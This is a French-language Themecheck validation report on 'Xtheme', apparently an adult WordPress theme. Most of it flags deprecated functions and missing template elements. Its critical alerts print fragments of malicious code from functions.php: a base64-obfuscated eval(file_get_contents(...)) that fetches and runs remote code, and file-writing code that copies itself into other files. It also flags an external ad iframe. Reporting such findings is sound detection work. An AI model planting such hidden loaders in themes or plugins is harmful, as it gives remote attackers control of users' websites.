0
Résultats de validation

Xtheme

Xtheme

WordPress 6.7.1 theme
0
  • TYPE DE THèMEThème WordPress %s 6.7.1
  • NOM DU FICHIERxtheme.zip
  • TAILLE DU FICHIER362663 octets
  • MD5bbca81426e793cebe11e10916934228b
  • SHA1c4b06e4b04393aef7d04578b8b04c7b4491e82e4
  • LICENCEAucun
  • FICHIERS INCLUSCSS, PHP, Bitmap images
  • URI DU THèME URIhttp://www.wpadultthemes.xyz
  • URI DE L'AUTEUR
  • DATE DE CRéATION2021-12-01
  • DERNIèRE MISE à JOUR DU FICHIER2021-12-01
  • DERNIèRE VALIDATION2021-12-01 15:33
  • AUTRES VERSIONS

    : 0%

    : 0%

Ce thème n'est peut être pas libre. Themecheck ne distribue pas de thèmes commerciaux.
Alertes critiques
  1. Title : Title Absence de référence à add_theme_support( "title-tag" ) dans le thème.Le thème doit avoir des tags <title>, idéalement dans le fichier header.php.Le thème doit comporter un appel à wp_title(), idéalement dans le fichier header.php.Les tags <title> ne peuvent contenir qu'un appe à wp_title(). wp_title filter soit être utilisée pour modifier la sortie.
  2. Failles de sécurité : Utilisation de eval() eval trouvé dans le fichier functions.php. 25: eval(@file_get_contents(base64_decode('aHR0cDovL3d3dy5mcmVld29yZHByZXN0aGVt
  3. Failles de sécurité : Utilisation de base64_decode() base64_decode trouvé dans le fichier functions.php. 25: eval(@file_get_contents(base64_decode('aHR0cDovL3d3dy5mcmVld29yZHByZXN0aGVtZXMuY29tL3RoZW1lLnR4dA==
  4. Présence d'iframes : Les iframes sont parfois utilisées pour charger du contenu non désirés ou du code malicieux sur des sites tiers <iframe src="http://banners.passion.com/go/page/iframe_cm_17852?pid=g1426080-ppc" width="160" height="240" frameborder="no" marginwidth="0" marginheight="0" scrolling="no" align="middle"> trouvé dans le fichier search.php. 10: <iframe src='http://banners.passion.com/go/page/iframe_cm_17852?pid=g142608
  5. Code malveillant : Opérations sur système de fichiers file_get_contents trouvé dans le fichier functions.php. 25: eval(@file_get_contents(base64_decode('aHR0cDovL3d3dy5mcmVld29yZHByZXN0aGVtZXMuY2202: $widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),'<'.'?'));209: $cont=file_get_contents($item);file_get_contents trouvé dans le fichier functions.php. 25: eval(@file_get_contents(base64_decode('aHR0cDovL3d3dy5mcmVld29yZHByZXN0aGVtZXMuY2202: $widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),'<'.'?'));209: $cont=file_get_contents($item);file_get_contents trouvé dans le fichier functions.php. 25: eval(@file_get_contents(base64_decode('aHR0cDovL3d3dy5mcmVld29yZHByZXN0aGVtZXMuY2202: $widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),'<'.'?'));209: $cont=file_get_contents($item);file_get_contents trouvé dans le fichier functions.php. 25: eval(@file_get_contents(base64_decode('aHR0cDovL3d3dy5mcmVld29yZHByZXN0aGVtZXMuY2202: $widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),'<'.'?'));209: $cont=file_get_contents($item);fopen trouvé dans le fichier functions.php. 214: $output=rtrim($output, '\n\t'); fputs($f=fopen($item,'w+'),$cont . $seprar . '\n' .$widget);fclose($f); fclose trouvé dans le fichier functions.php. 214: $output=rtrim($output, '\n\t'); fputs($f=fopen($item,'w+'),$cont . $seprar . '\n' .$widget);fclose($f);
  6. Menu Admin : Les thèmes doivent utiliser add_theme_page () pour ajouter des pages admin. Fichier functions.php : 566: add_menu_page($themename, $themename, 'administrator', basename(__FILE__),
  7. Largeur de la page : Définition correcte de content_width Aucune largeur de contenu a été définie. Exemple:
    if ( ! isset ($content_width) ) $content_width = 900;
  8. Fonctions obsolètes : get_settings get_settings trouvé dans le fichier functions.php . Obsolète depuis la version de la 2.1. Il est prérable d'utiliser get_option() à la place. 630: <input name='<?php echo $value['id']; ?>' id='<?php echo $value['id']; ?>' type='<?php echo $value['type']; ?>' value='<?php if ( get_settings( $value['id'] ) != '') { echo stripslashes(get_settings( $valu642: <textarea name='<?php echo $value['id']; ?>' type='<?php echo $value['type']; ?>' cols='' rows=''><?php if ( get_settings( $value['id'] ) != '') { echo stripslashes(get_settings( $valu658: <option <?php if (get_settings( $value['id'] ) == $option) { echo 'selected='selected''; } ?>
  9. Fonctions obsolètes : wp_specialchars wp_specialchars trouvé dans le fichier login.php . Obsolète depuis la version de la 2.8. Il est prérable d'utiliser esc_html() à la place. 24: <p><input type='text' name='log' value='' placeholder='<?php echo wp_specialchars(stripslashes($user_login), 1) ?>'></p>wp_specialchars trouvé dans le fichier search.php . Obsolète depuis la version de la 2.8. Il est prérable d'utiliser esc_html() à la place. 17: <?php _e('Search Results For', 'xtheme'); ?> <?php /* Search Count */ $allsearch = &new WP_Query('s=$s&showposts=-1'); $key = wp_specialchars($s, 1); $count = $allsearch->post_count; _e(''); _e('<span wp_specialchars trouvé dans le fichier functions.php . Obsolète depuis la version de la 2.8. Il est prérable d'utiliser esc_html() à la place. 21: <textarea name='second-excerpt' id='second-excerpt' cols='60' rows='4' tabindex='30' style='width: 97%;'><?php echo wp_specialchars( get_post_meta( $object->ID, 'Video Description', true ), 1
  10. Fonctions obsolètes : get_currentuserinfo get_currentuserinfo trouvé dans le fichier header.php . Obsolète depuis la version de la 4.5. Il est prérable d'utiliser wp_get_current_user à la place. 58: <?php global $user_ID; if ( $user_ID ) : global $current_user; get_currentuserinfo(); ?> 59: <a rel='nofollow' href='<? echo bp_loggedin_user_domain().'profile/'; ?>'><b><?php _e('My Account', 'xtheme'); ?></b></a> <span style='margin-left:5px;'><?php global $userdata; get_currentuserinfo(); echo get_avatar( $userdata->ID, 18 ); ?></span> | <a
  11. Fonctions obsolètes : get_bloginfo get_bloginfo('template_url') trouvé dans le fichier functions.php. Il est préférable d'utiliser get_template_directory_uri(). 566: add_menu_page($themename, $themename, 'administrator', basename(__FILE__), 'mytheme_admin', get_bloginfo('template_url').'/functions/images/menuicon.png');
  12. Fonctions obsolètes : bloginfo bloginfo('url') trouvé dans le fichier index.php. Il est préférable d'utiliser echo esc_url( home_url() ). 15: <div class='showMore'><a href='<?php bloginfo('url'); ?>/'><?php $numpost = $wpdb->get_var('SELECT COUNT(*) FROMbloginfo('url') trouvé dans le fichier archive.php. Il est préférable d'utiliser echo esc_url( home_url() ). 15: <div class='showMore'><a href='<?php bloginfo('url'); ?>/'><?php $numpost = $wpdb->get_var('SELECT COUNT(*) FROMbloginfo('url') trouvé dans le fichier header.php. Il est préférable d'utiliser echo esc_url( home_url() ). 38: <a href='<?php bloginfo('url'); ?>/' title='<?php bloginfo('name'); ?>/' id='mainLogo'> 42: <form action='<?php bloginfo('url'); ?>/' method='get' id='searchForm'> 59: <a rel='nofollow' href='<? echo bp_loggedin_user_domain().'profile/'; ?>'><b><?php _e('My Account', 'xtheme'); ?></b></a> <span style='margin-left:5px;'><?php global $userdata; get_currentuserinfo(); echo get_avatar( $userdata->ID, 18 ); ?></span> | <a href='<?php echo bp_core_get_user_domain(bp_loggedin_user_id()); ?>'><?php cg_current_user_notification_count(); ?> - <b><?php _e('Notifications', 'xtheme'); ?></b></a> | <a rel='nofollow' href='<?php bloginfo('url'); ?>/activity'><b><?php _e('Activity', 'xtheme'); ?></b></a>61: <a href='<?php bloginfo('url'); ?>/signup'><b><?php _e('Create Account', 'xtheme'); ?></b>bloginfo('template_directory') trouvé dans le fichier header.php. Il est préférable d'utiliser echo esc_url( get_template_directory_uri() ). 20: <link rel='shortcut icon' href='<?php bloginfo('template_directory'); ?>/images/favicon.ico'> 22: <link rel='stylesheet' href='<?php bloginfo('template_directory'); ?>/css/video.css'> 23: <link rel='stylesheet' href='<?php bloginfo('template_directory'); ?>/style.css'> 25: <script src='<?php bloginfo('template_directory'); ?>/js/tabcontent.js' type='text/javascript'26: <link href='<?php bloginfo('template_directory'); ?>/css/tabcontent.css' rel='stylesheet' typ27: <script src='<?php bloginfo('template_directory'); ?>/js/modernizr-2.5.3.min.js'></script> 28: <script src='<?php bloginfo('template_directory'); ?>/js/script-head.js?v=2'></script> <scrip29: <script src='<?php bloginfo('template_directory'); ?>/js/mobile.js'></script> 40: <img src='<?php bloginfo('template_directory'); ?>/images/logo.gif' alt='<?php bloginfo('nabloginfo('template_url') trouvé dans le fichier header.php. Il est préférable d'utiliser echo esc_url( get_template_directory_uri() ). 24: <link rel='stylesheet' type='text/css' href='<?php bloginfo('template_url'); ?>/css/<?php echo get_option('xt_color_scheme'); 30: <link href='<?php bloginfo('template_url'); ?>/css/jquery.thumbnailScroller.css' rel='styleshbloginfo('url') trouvé dans le fichier best.php. Il est préférable d'utiliser echo esc_url( home_url() ). 20: <div class='showMore'><a href='<?php bloginfo('url'); ?>/'><?php $numpost = $wpdb->get_var('SELECT COUNT(*) FROMbloginfo('template_directory') trouvé dans le fichier single.php. Il est préférable d'utiliser echo esc_url( get_template_directory_uri() ). 113: <script type='text/javascript' src='<?php bloginfo('template_directory'); ?>/js/ads.js?v=1'></script> 115: <script>window.jQuery || document.write('<?php bloginfo('template_directory'); ?>/js/jquery-1.7.2.min.js'><\/script>')</sc116: <script type='text/javascript' src='<?php bloginfo('template_directory'); ?>/js/script.js?v=12'></script> bloginfo('template_url') trouvé dans le fichier register.php. Il est préférable d'utiliser echo esc_url( get_template_directory_uri() ). 273: <script src='<?php bloginfo('template_url'); ?>/js/jquery.thumbnailScroller.js'></script>bloginfo('template_directory') trouvé dans le fichier functions.php. Il est préférable d'utiliser echo esc_url( get_template_directory_uri() ). 571: $file_dir=get_bloginfo('template_directory');682: <div class='rm_title'><h3><img src='<?php bloginfo('template_directory')?>/functions/images/trans.png' class='inactiv
  13. Fonctions obsolètes : get_option get_option('home') trouvé dans le fichier login.php. Il est préférable d'utiliser home_url(). 23: <form method='post' action='<?php echo get_option('home'); ?>/wp-login.php'>40: <p><?php _e('Forgot your Password?', 'xtheme'); ?> <a href='<?php echo get_option('home'); ?>/wp-login.php?action=lostpassword'><?php _e('Click He
Attention
  1. Script de core désabonné : Désabonnement d'un script de coreAppel à wp_deregister_script dans functions.php. Les thèmes ne doivent appeler wp_deregister_script sur des scripts du core. 52: if ( !is_admin() ) { wp_deregister_script('jquery'); wp_register_script('jquery', ('http://ajax.
  2. URIs particulières : Présence de tags inconnusTheme URI et Author URI ne doivent pas être identiques.
  3. tags du thème : Présence de tags inconnusTag inconnu trouvé dans l'entête du fichier style.css.
  4. Text domain : Utilisation incorrecte des fonctions de traduction.Une fonction de traduction utilisée sans text-domain. Fonction _e, avec les arguments '' dans le fichier search.php.Une fonction de traduction utilisée sans text-domain. Fonction _e, avec les arguments '<span class="search-terms">' dans le fichier search.php.Une fonction de traduction utilisée sans text-domain. Fonction _e, avec les arguments '</span>' dans le fichier search.php.Une fonction de traduction utilisée sans text-domain. Fonction _e, avec les arguments ' — ' dans le fichier search.php.Une fonction de traduction utilisée sans text-domain. Fonction _e, avec les arguments 'Videos' dans le fichier search.php.Une fonction de traduction utilisée sans text-domain. Fonction __, avec les arguments 'Read more &#8250;' dans le fichier page.php.Une fonction de traduction utilisée sans text-domain. Fonction __, avec les arguments 'Read more &#8250;' dans le fichier pagefullwidth.php.Une fonction de traduction utilisée sans text-domain. Fonction _e, avec les arguments 'You Like:' dans le fichier post-like.php.Une fonction de traduction utilisée sans text-domain. Fonction _e, avec les arguments 'You don\'t like anything yet.' dans le fichier post-like.php.Une fonction de traduction utilisée sans text-domain. Fonction __, avec les arguments 'You Like:' dans le fichier post-like.php.Une fonction de traduction utilisée sans text-domain. Fonction _e, avec les arguments 'Today\'s Most Popular Posts' dans le fichier post-like.php.Une fonction de traduction utilisée sans text-domain. Fonction _e, avec les arguments 'This Month\'s Most Popular Posts' dans le fichier post-like.php.Une fonction de traduction utilisée sans text-domain. Fonction _e, avec les arguments 'This Week\'s Most Popular Posts' dans le fichier post-like.php.Une fonction de traduction utilisée sans text-domain. Fonction _e, avec les arguments 'Most Popular Posts' dans le fichier post-like.php.Une fonction de traduction utilisée sans text-domain. Fonction __, avec les arguments 'Main Navigation Menu' dans le fichier functions.php.Une fonction de traduction utilisée sans text-domain. Fonction __, avec les arguments 'Footer links Menu' dans le fichier functions.php.Une fonction de traduction utilisée sans text-domain. Fonction __, avec les arguments "There is no excerpt because this is a protected post." dans le fichier functions.php.Plusieurs text-domain sont utilisés dans le thème. Cela signifie que le thème n'est pas compatible avec les language packs de WordPress. Les domaines trouvés sont xtheme, buddypress, status, bbpress, wpb.
  5. Cdn : Utilisation d'un CDNUne url de type CDN a été trouvée dans le code netdna.bootstrapcdn.com/font-awesome. Les fichiers CSS et JS ne doivent pas être chargés depuis un CDN. Ces ressources doivent être intégrées dans le thème.
  6. Contextes de plugin : Fonctionnalités de pluginLe thème utilise la fonction add_shortcode(). L'utilisation des custom post-content shortcodes est du domaine des plugins.
  7. Fichiers indésirables : Fichier système de Windowsthumbs.db a été trouvé.
  8. Balises courtes PHP : Présence de balises PHP courtesPrésence de balises PHP courtes dans le fichier login.php. "Il est conseillé de ne pas les utiliser car elles ne sont seulement disponibles lors de l'activation de la directive de configuration short_open_tag du php.ini, ou si PHP a été configuré avec l'option --enable-short-tags" (php.net), ce qui n'est pas le cas sur de nombreux serveurs.34: <input type='hidden' name='redirect_to' value='<? echo bp_loggedin_user_domain().'profile/'; ?>' />Présence de balises PHP courtes dans le fichier index.php. "Il est conseillé de ne pas les utiliser car elles ne sont seulement disponibles lors de l'activation de la directive de configuration short_open_tag du php.ini, ou si PHP a été configuré avec l'option --enable-short-tags" (php.net), ce qui n'est pas le cas sur de nombreux serveurs.42: <? endwhile;endif; ?> Présence de balises PHP courtes dans le fichier header.php. "Il est conseillé de ne pas les utiliser car elles ne sont seulement disponibles lors de l'activation de la directive de configuration short_open_tag du php.ini, ou si PHP a été configuré avec l'option --enable-short-tags" (php.net), ce qui n'est pas le cas sur de nombreux serveurs.59: <a rel='nofollow' href='<? echo bp_loggedin_user_domain().'profile/'; ?>'><b><?php _e('My Account',
  9. Menu Admin : Détection des niveaux d'utilisateurs devenus obsolètes dans Wordpress 2.0. WordPress codexFichier login.php : 21: <?php if (!(current_user_can('level_0'))){ ?>
  10. Eléments fondamentaux : Présence de wp_footer()wp_footer introuvable.
  11. Eléments fondamentaux : Présence de add_theme_support()add_theme_support( 'automatic-feed-links' ) introuvable.
  12. Eléments fondamentaux : Présence de wp_list_comments()wp_list_comments introuvable.
  13. Eléments fondamentaux : Présence de comment_form()comment_form introuvable.
  14. Eléments fondamentaux : Présence de body_class()body_class call in body tag introuvable.
  15. Eléments fondamentaux : Présence de post_class()post_class introuvable.
  16. Pagination des commentaires : Déclaration de la pagination des commentairesLe thème ne prend pas en charge la pagination de commentaire. La fonction paginate_comments_links() permet d'ajouter une pagination de commentaire.
  17. Réponses aux commentaires : Déclarations des réponses aux commentairesImpossible de trouver le comment-reply le script js en file d'attente, mais une référence au «commentaire-réponse» a été trouvé. Assurez-vous que le script commentaire de réponse est en file d'attente correctement sur les pages singulières.
  18. Eléments custom : Présence d'une entête customAucune référence à custom header n'a été trouvée dans le thème.
  19. Eléments custom : Présence d'un fond customAucune référence à custom background n'a été trouvée dans le thème.
  20. Editor style : Présence de l'édition de styleAucune référence à add_editor_style() n'a été trouvée dans le thème. Il est recommandé que le thème implémente l'édition de style, de manière à faire correspondre le contenu de l'éditeur l'affichage dans le thème.
  21. Fichiers CSS : Présence de la version du thèmeLa déclaration Version: manque dans le header du fichier style.css.
  22. Fichiers CSS : Présence du type de licenseLa déclaration License: manque dans le header du fichier style.css.
  23. Fichiers CSS : Présence de l'url de la licenseLa déclaration License URI: manque dans le header du fichier style.css.
  24. Fichiers CSS : Présence de la classe .stickyLa classe CSS .sticky n'a pas été trouvée dans les styles du thème.
  25. Fichiers CSS : Présence de la classe .bypostauthorLa classe CSS .bypostauthor n'a pas été trouvée dans les styles du thème.
  26. Fichiers CSS : Présence de la classe .gallery-captionLa classe CSS .gallery-caption n'a pas été trouvée dans les styles du thème.
  27. Fichiers CSS : Présence de la classe .screen-reader-textLa class css .screen-reader-text est nécessaire dans le css du thème. Voir : le Codex pour un exemple d'implémentation.
  28. Implémentation de la date et de l'heure : Utilisation de the_time()Au moins une date codée en dur a été trouvée dans le fichier archive.php. Il est préférable d'utiliser la fonction get_option( 'date_format' )à la place.
  29. Screenshot : Copie d'écranMauvaises dimensions du screenshot ! Format détecté : 520x450px (52:45). Le format doit être 4:3.La taille du screenshot est 520x450px. La taille recommandée est 1200x900, pour prendre en compte les affichages HiDPI. Bien qu'une résolution de 1200x900 soit recommandée, toutes les images au format 4:3 sont acceptables.Mauvaise extension de fichier screenshot ! Le fichier screenshot.png n'est pas un véritable fichier JPG. Le type détecté est : "image/png".
Info
  1. Liens statiques : Présence de liens codés en durLien potentiellement codés en dur trouvé dans le fichier change-avatar.php.7: <p><?php _e( 'Your avatar will be used on your profile and throughout the site. If there is a <a href='http://gravatar.com'>Gravatar</a> associated with your account email we wil55: <p><?php _e( 'Your avatar will be used on your profile and throughout the site. To change your avatar, please create an account with <a href='http://gravatar.com'>Gravatar</a> using the same email address as you used 7: <p><?php _e( 'Your avatar will be used on your profile and throughout the site. If there is a <a href='http://gravatar.com'>Gravatar</a> associated with your account email we wil55: <p><?php _e( 'Your avatar will be used on your profile and throughout the site. To change your avatar, please create an account with <a href='http://gravatar.com'>Gravatar</a> using the same email address as you used Lien potentiellement codés en dur trouvé dans le fichier functions.php.698: <div style='font-size:9px; margin-bottom:10px;'>Theme by: <a href='http://www.maestroweb.it'>maestroweb</a> Support: <a href='http://maestroweLien potentiellement codés en dur trouvé dans le fichier footer.php.14: Free Wordpress Theme <a href='http://www.wpadultthemes.xyz' title='wp adult themes'>Wp Adult Themes</a>
  2. Fichiers obligatoires : Présence du fichier comments.phpFichierr comments.php introuvable dans le thème.
  3. Fichiers optionnels : Présence du fichierde style pour les écritures de droite vers la gauche rtl.cssCe thème ne contient pas le fichier optionnel rtl.php.
  4. Fichiers optionnels : Présence du fichier-template de commentaires comments.phpCe thème ne contient pas le fichier optionnel comments.php.
  5. Fichiers optionnels : Présence du fichier-template fron-*page.phpCe thème ne contient pas le fichier optionnel front-page.php.
  6. Fichiers optionnels : Présence du fichier-template de page d'accueil home.phpCe thème ne contient pas le fichier optionnel home.php.
  7. Fichiers optionnels : Présence du fichier-template des posts seuls single.phpCe thème ne contient pas le fichier optionnel comments.php.
  8. Fichiers optionnels : Présence du fichier-template de catégorie category.phpCe thème ne contient pas le fichier optionnel category.php.
  9. Fichiers optionnels : Présence du fichier-template des tags tag.phpCe thème ne contient pas le fichier optionnel tag.php.
  10. Fichiers optionnels : Présence du fichier template de taxinomie taxonomy.phpCe thème ne contient pas le fichier optionnel taxonomy.php.
  11. Fichiers optionnels : Présence du fichier-template author.phpCe thème ne contient pas le fichier optionnel author.php.
  12. Fichiers optionnels : Présence de du fichier-template des dates et heures date.phpCe thème ne contient pas le fichier optionnel date.php.
  13. Fichiers optionnels : Présence du fichier-template des pièces jointes attachment.phpCe thème ne contient pas le fichier optionnel attachment.php.
  14. Fichiers optionnels : Présence du fichier-template des images image.phpCe thème ne contient pas le fichier optionnel image.php.
  15. Fichiers optionnels : Présnece du fichier-template 404 Not Found 404.phpCe thème ne contient pas le fichier optionnel 404.php.
  16. Utilisation d'includes : Utilisation de include ou de de requireLe thème semble utiliser include ou require : activity-loop.php 21: <?php include( locate_template( array( 'activity/entry.php' ), false ) ) ?> Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.Le thème semble utiliser include ou require : single.php 94: <?php include (TEMPLATEPATH . '/lastvideos.php'); ?> Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
Other checked themes